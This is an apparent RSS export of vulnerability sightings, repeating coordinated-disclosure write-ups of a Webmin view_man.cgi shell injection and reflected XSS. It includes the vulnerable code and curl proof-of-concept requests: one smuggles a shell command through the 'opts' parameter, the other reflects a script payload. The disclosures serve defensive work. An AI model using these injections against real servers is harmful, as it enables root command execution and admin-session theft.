https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Thu, 18 Jun 2026 15:12:39 +0000 https://vulnerability.circl.lu/sighting/b63c0c18-acc0-4eeb-b89b-66966105ac05/export {"uuid": "b63c0c18-acc0-4eeb-b89b-66966105ac05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/0153f5bf20c868cd82dca3e99a9e70a4", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &backquote_command(\"$config{'man2html_path'} -v 2>&1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i && $1 >= 3) {\n # New version uses a different syntax!\n $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&sec=\\\\\\${section}&opts=$in{'opts'}\\\" --bare\";\n $out = &backquote_command(\"$cmd 2>&1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html >=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl\n # Install Webmin 2.641 ...\n # Install Earl Hood man2html >=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&pass=ClassB!2026\" \\\n https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] \"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **6.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` >=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-024 is the incomplete-coverage variant on the shell-injection axis (and the companion K-025 XSS is the incomplete-coverage variant on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:15.000000Z"} {"uuid": "b63c0c18-acc0-4eeb-b89b-66966105ac05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/0153f5bf20c868cd82dca3e99a9e70a4", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &backquote_command(\"$config{'man2html_path'} -v 2>&1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i && $1 >= 3) {\n # New version uses a different syntax!\n $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&sec=\\\\\\${section}&opts=$in{'opts'}\\\" --bare\";\n $out = &backquote_command(\"$cmd 2>&1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html >=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl\n # Install Webmin 2.641 ...\n # Install Earl Hood man2html >=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&pass=ClassB!2026\" \\\n https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] \"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **6.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` >=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-024 is the incomplete-coverage variant on the shell-injection axis (and the companion K-025 XSS is the incomplete-coverage variant on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:15.000000Z"} https://vulnerability.circl.lu/sighting/b63c0c18-acc0-4eeb-b89b-66966105ac05/export Sun, 17 May 2026 15:23:15 +0000 https://vulnerability.circl.lu/sighting/efe92baf-b6aa-476f-8607-4cfb64f29693/export {"uuid": "efe92baf-b6aa-476f-8607-4cfb64f29693", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/6da8ff9f0cecd699ca89b6d71654b71f", "content": "# Webmin `man/view_man.cgi` \u2014 Reflected XSS via `opts` Parameter (legacy `man2html` branch)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` performs a regex substitution on the HTML output of the legacy `man2html` binary that interpolates the `opts` CGI parameter directly into the response body without HTML or URL encoding. This produces reflected XSS reachable on the default configuration of Debian, Ubuntu, Fedora, and RHEL.\n\nThe script is rendered inside the Webmin administrator UI context, allowing an attacker who lures an authenticated admin into clicking a crafted link to execute JavaScript with full admin-session privileges (session theft, configuration changes, chaining to other authenticated endpoints).\n\nThis is the `else` branch counterpart to a companion shell-injection finding (separate disclosure). The two findings together cover the entire vulnerable branch in `view_man.cgi` regardless of which `man2html` variant is installed.\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to legacy Hamilton C `man2html` (typically `1.6g-14`)\n- **Default reach**: Debian / Ubuntu / Fedora / RHEL stock \u2014 **default-config exploitable on most distributions**\n- **Privilege required**: none (attacker is unauthenticated; victim must be an authenticated Webmin admin who clicks the crafted link)\n\n## Vulnerable Code\n\n`man/view_man.cgi` (line 85, pre-patch):\n\n```perl\nelse {\n # Old version of man2html\n $cmd .= \" $qout | $config{'man2html_path'} -H \\\"\\\" -M \\\"view_man.cgi\\\"\";\n $out = &backquote_command(\"$cmd 2>&1\", 1);\n $out =~ s/^.*Content-type:.*\\n//i;\n $out =~ s/http:\\/\\///ig;\n $out =~ s/\\?/\\?sec=/ig;\n $out =~ s/\\+/&opts=$in{'opts'}&page=/ig; # \u2190 K-025 sink: $in{'opts'} interpolated unescaped\n $out =~ s/.*//isg;\n ...\n}\n```\n\nThe regex substitution replaces every `+` character in the man2html-generated HTML with the string `&opts=$in{'opts'}&page=`. Because `$in{'opts'}` is interpolated verbatim into HTML output (and later passed to `&show_view_table()` for rendering), any HTML/JavaScript in the parameter is reflected directly into the admin UI.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Debian default man2html (Hamilton C 1.6g)\ndocker run -d --name webmin-poc -p 10000:10000 \\\n -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl man2html\n # Install Webmin 2.641 ...\n'\n\n# Login as admin (or any user with Manual Pages access)\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=admin&pass=AdminPass!2026\" \\\n https://localhost:10000/session_login.cgi\n\n# Baseline: count in benign response\ncurl -k -b $COOKIE \\\n \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=BENIGN\" \\\n | grep -c 'alert(\"VERIFY_TOKEN\")'\n# 5 (literal payload reflected 5 times, unescaped)\n```\n\nURL-decoded `opts` payload: `alert(\"VERIFY_TOKEN\")`. The reflected response body contains the literal string verbatim (5 occurrences), in the form `&opts=alert(\"VERIFY_TOKEN\")&page=FORMAT` inside `` constructs.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stock Debian 12 `man2html 1.6g-14`:\n\n- HTTP 200 response of 78747 bytes\n- Literal `alert(\"VERIFY_TOKEN\")` reflected **5 times** in response body, all unescaped\n- Baseline request (benign opts value) returns **0** `` occurrences \u2014 confirming the script tags came from attacker input, not from man2html output\n- Sample reflection (verbatim line from response): `&opts=alert(\"VERIFY_TOKEN\")&page=FORMAT`\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`\n- **Score**: **6.1 (Medium)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | Low | Default configuration on most distributions |\n| PR | None | Vulnerable handler reachable without authentication; impact requires authenticated admin victim |\n| UI | Required | Admin must click the malicious link |\n| Scope | Changed | Script runs in the Webmin admin UI security context, separate from CGI handler context |\n| C/I/A | Low / Low / None | Session cookies and DOM exposed; admin-session writes possible |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15 (alongside companion shell-injection finding)\n- **Acknowledged**: 2026-05-15 (Day 0)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n - https://github.com/webmin/webmin/commit/8159fad28f50193f6405786f21768caf13820c11 (primary `html_escape` fix)\n - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` \u2014 `urlize` is a semantically better match for URL-attribute context than `html_escape`; also adds defense-in-depth `&urlize()` at the link-generation site in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-025 is the incomplete-coverage variant of the 2017 \"Escape untrusted params\" patch series on the XSS axis.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:17.000000Z"} {"uuid": "efe92baf-b6aa-476f-8607-4cfb64f29693", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/6da8ff9f0cecd699ca89b6d71654b71f", "content": "# Webmin `man/view_man.cgi` \u2014 Reflected XSS via `opts` Parameter (legacy `man2html` branch)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` performs a regex substitution on the HTML output of the legacy `man2html` binary that interpolates the `opts` CGI parameter directly into the response body without HTML or URL encoding. This produces reflected XSS reachable on the default configuration of Debian, Ubuntu, Fedora, and RHEL.\n\nThe script is rendered inside the Webmin administrator UI context, allowing an attacker who lures an authenticated admin into clicking a crafted link to execute JavaScript with full admin-session privileges (session theft, configuration changes, chaining to other authenticated endpoints).\n\nThis is the `else` branch counterpart to a companion shell-injection finding (separate disclosure). The two findings together cover the entire vulnerable branch in `view_man.cgi` regardless of which `man2html` variant is installed.\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to legacy Hamilton C `man2html` (typically `1.6g-14`)\n- **Default reach**: Debian / Ubuntu / Fedora / RHEL stock \u2014 **default-config exploitable on most distributions**\n- **Privilege required**: none (attacker is unauthenticated; victim must be an authenticated Webmin admin who clicks the crafted link)\n\n## Vulnerable Code\n\n`man/view_man.cgi` (line 85, pre-patch):\n\n```perl\nelse {\n # Old version of man2html\n $cmd .= \" $qout | $config{'man2html_path'} -H \\\"\\\" -M \\\"view_man.cgi\\\"\";\n $out = &backquote_command(\"$cmd 2>&1\", 1);\n $out =~ s/^.*Content-type:.*\\n//i;\n $out =~ s/http:\\/\\///ig;\n $out =~ s/\\?/\\?sec=/ig;\n $out =~ s/\\+/&opts=$in{'opts'}&page=/ig; # \u2190 K-025 sink: $in{'opts'} interpolated unescaped\n $out =~ s/.*//isg;\n ...\n}\n```\n\nThe regex substitution replaces every `+` character in the man2html-generated HTML with the string `&opts=$in{'opts'}&page=`. Because `$in{'opts'}` is interpolated verbatim into HTML output (and later passed to `&show_view_table()` for rendering), any HTML/JavaScript in the parameter is reflected directly into the admin UI.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Debian default man2html (Hamilton C 1.6g)\ndocker run -d --name webmin-poc -p 10000:10000 \\\n -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl man2html\n # Install Webmin 2.641 ...\n'\n\n# Login as admin (or any user with Manual Pages access)\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=admin&pass=AdminPass!2026\" \\\n https://localhost:10000/session_login.cgi\n\n# Baseline: count in benign response\ncurl -k -b $COOKIE \\\n \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=BENIGN\" \\\n | grep -c 'alert(\"VERIFY_TOKEN\")'\n# 5 (literal payload reflected 5 times, unescaped)\n```\n\nURL-decoded `opts` payload: `alert(\"VERIFY_TOKEN\")`. The reflected response body contains the literal string verbatim (5 occurrences), in the form `&opts=alert(\"VERIFY_TOKEN\")&page=FORMAT` inside `` constructs.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stock Debian 12 `man2html 1.6g-14`:\n\n- HTTP 200 response of 78747 bytes\n- Literal `alert(\"VERIFY_TOKEN\")` reflected **5 times** in response body, all unescaped\n- Baseline request (benign opts value) returns **0** `` occurrences \u2014 confirming the script tags came from attacker input, not from man2html output\n- Sample reflection (verbatim line from response): `&opts=alert(\"VERIFY_TOKEN\")&page=FORMAT`\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`\n- **Score**: **6.1 (Medium)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | Low | Default configuration on most distributions |\n| PR | None | Vulnerable handler reachable without authentication; impact requires authenticated admin victim |\n| UI | Required | Admin must click the malicious link |\n| Scope | Changed | Script runs in the Webmin admin UI security context, separate from CGI handler context |\n| C/I/A | Low / Low / None | Session cookies and DOM exposed; admin-session writes possible |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15 (alongside companion shell-injection finding)\n- **Acknowledged**: 2026-05-15 (Day 0)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n - https://github.com/webmin/webmin/commit/8159fad28f50193f6405786f21768caf13820c11 (primary `html_escape` fix)\n - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` \u2014 `urlize` is a semantically better match for URL-attribute context than `html_escape`; also adds defense-in-depth `&urlize()` at the link-generation site in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. K-025 is the incomplete-coverage variant of the 2017 \"Escape untrusted params\" patch series on the XSS axis.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:23:17.000000Z"} https://vulnerability.circl.lu/sighting/efe92baf-b6aa-476f-8607-4cfb64f29693/export Sun, 17 May 2026 15:23:17 +0000 https://vulnerability.circl.lu/sighting/54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff/export {"uuid": "54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/3e6d2720295079f2315f3f87844c68b7", "content": "# Webmin `man/view_man.cgi` \u2014 Authenticated Shell Injection via `opts` Parameter (RCE \u2192 root)\n\n## Summary\n\nIn Webmin through version 2.641, the file `man/view_man.cgi` constructs a shell command from the user-supplied `opts` CGI parameter without proper neutralization. An authenticated user with access to the \"Manual Pages\" module can inject shell metacharacters via `opts`, leading to arbitrary command execution as the Webmin server process (root by default, since `miniserv` forks CGI handlers as root).\n\nThe vulnerable code path is only reached when the configured `man2html_path` points to **Earl Hood's Perl `man2html` version 3.0 or later**. This is the default on Arch Linux (`man2html 3.0.1-10`) and FreeBSD ports (`3.1.x`). On Debian / Ubuntu / Fedora / RHEL, the legacy Hamilton C `man2html 1.6g` ships by default and is not affected by this finding (but is affected by a companion XSS \u2014 see separate disclosure).\n\n## Affected\n\n- **Product**: Webmin\n- **Versions**: all versions through 2.641 (from initial checkin `fc1c1b243` to current release)\n- **Component**: `man/view_man.cgi`\n- **Precondition**: configured `man2html_path` points to Earl Hood Perl `man2html` v3.0+\n- **Privilege required**: authenticated Webmin user with the \"Manual Pages\" module ACL\n\n## Vulnerable Code\n\n`man/view_man.cgi` (lines 72-77, pre-patch):\n\n```perl\n$manout = &backquote_command(\"$config{'man2html_path'} -v 2>&1\", 1);\nif ($manout =~ /Version:\\s+([0-9\\.]+)/i && $1 >= 3) {\n # New version uses a different syntax!\n $cmd .= \" $qout | nroff -mman | $config{'man2html_path'} --cgiurl \\\"view_man.cgi?page=\\\\\\${title}&sec=\\\\\\${section}&opts=$in{'opts'}\\\" --bare\";\n $out = &backquote_command(\"$cmd 2>&1\", 1);\n}\n```\n\nThe `$in{'opts'}` variable is interpolated directly into the shell-quoted `--cgiurl` argument, then the whole string is passed to `backquote_command()` for execution. Shell metacharacters (`;`, `` ` ``, `$()`, `|`, etc.) in `opts` escape the intended context.\n\n## Reproduction (Docker)\n\n```bash\n# Setup container with Webmin 2.641 + Earl Hood man2html >=3.0\ndocker run -d --name webmin-poc -p 10000:10000 \\\n -e WEBMIN_USER=admin -e WEBMIN_PASSWORD=AdminPass!2026 \\\n debian:12 bash -lc \"tail -f /dev/null\"\n\ndocker exec webmin-poc bash -lc '\n apt-get update && apt-get install -y wget perl libnet-ssleay-perl openssl\n # Install Webmin 2.641 ...\n # Install Earl Hood man2html >=3.0 (or stub binary returning \"Version: 3.0.1\" on -v)\n # Create low-priv user \"classb\" with Manual Pages module ACL granted\n'\n\n# Login as low-priv user\nCOOKIE=/tmp/webmin.cookies\ncurl -k -c $COOKIE -d \"user=classb&pass=ClassB!2026\" \\\n https://localhost:10000/session_login.cgi\n\n# Trigger the RCE\ncurl -k -b $COOKIE \\\n \"https://localhost:10000/man/view_man.cgi?page=ls&sec=1&opts=%22%3Btouch%20%2Ftmp%2Fpwn-by-%24%28id%20-u%29%3Becho%20%22\"\n\n# Verify marker file created as root (uid=0)\ndocker exec webmin-poc ls -la /tmp/pwn-by-0\n# -rw-r--r-- 1 root root 0 May 14 23:17 /tmp/pwn-by-0\n```\n\nThe URL-decoded `opts` payload is: `\";touch /tmp/pwn-by-$(id -u);echo \"` \u2014 closes the quote, executes `touch`, then re-opens quote to keep the rest of the shell command syntactically valid.\n\n## Dynamic Confirmation\n\nConfirmed in Docker with Webmin 2.641 + stub `man2html` binary returning `Version: 3.0.1` on `-v`:\n\n- Marker file `/tmp/pwn-by-0` created (owner: root, mtime: 2026-05-14T23:17:03)\n- `miniserv.log` shows `127.0.0.1 - classb [...] \"GET /man/view_man.cgi?...\" 200` \u2014 confirms low-priv user attribution\n- Class-B user authenticated via standard Webmin session, no admin escalation needed at HTTP layer\n\n## CVSS\n\n- **Vector**: `CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H`\n- **Score**: **6.5 (High)**\n\n| Metric | Value | Rationale |\n|---|---|---|\n| AV | Network | Webmin admin panel is network-accessible |\n| AC | High | Requires Earl Hood Perl `man2html` >=3.0 (not default on Debian/Ubuntu/Fedora/RHEL) |\n| PR | Low | Any authenticated Webmin user with \"Manual Pages\" module ACL |\n| UI | None | No user interaction |\n| Scope | Unchanged | Code runs as same root context CGI was already in |\n| C/I/A | High | Full root shell |\n\n## Vendor Coordination\n\n- **Maintainer**: Jamie Cameron ``\n- **Reported**: 2026-05-15\n- **Acknowledged**: 2026-05-15 (Day 0, ~7 hours after report)\n- **Patched**: 2026-05-15 (Day 0)\n- **Patch commits**:\n - https://github.com/webmin/webmin/commit/b251b7182cde84b20a00a90fd0ef0ed032fc6037 (primary `quotemeta` fix)\n - https://github.com/webmin/webmin/commit/aa87f85d4a12d4bcf712cb90bd84bf538a52892d (refactor: unified `$uopts = &urlize(...)` + source-side fix in `man/search.cgi`)\n- **Fixed in**: Webmin 2.642 (upcoming release)\n- **Vendor security page**: https://www.webmin.com/security.html (CVE ID and credit will be added on release)\n\n## Prior Art\n\n- **CVE-2017-9313** \u2014 Reflected XSS in `view_man.cgi` via `sec` parameter; commits `a330e913e`, `c2d4a90639` escaped `sec`/`page` but **did not** cover `opts`. This issue is the incomplete-coverage variant on the shell-injection axis (a companion reflected XSS finding in the legacy `man2html` branch of the same file is the corresponding gap on the XSS axis).\n- **CVE-2025-67738** \u2014 Filippo Decortes, Squid module `cachemgr.cgi`, same maintainer-accept class (shell-injection in CGI arg construction). Patched via identical `quotemeta` pattern.\n\n## Credit\n\n- **Discoverer**: j0hndo ``\n", "creation_timestamp": "2026-05-17T15:25:44.000000Z"} {"uuid": "54d31e2a-7aa9-4eac-9cde-9d1aa7eab7ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2017-9313", "type": "seen", "source": "https://gist.github.com/dohyun4455/3e6d2720295079f2315f3f87844c68b7", "content": "# Webmin 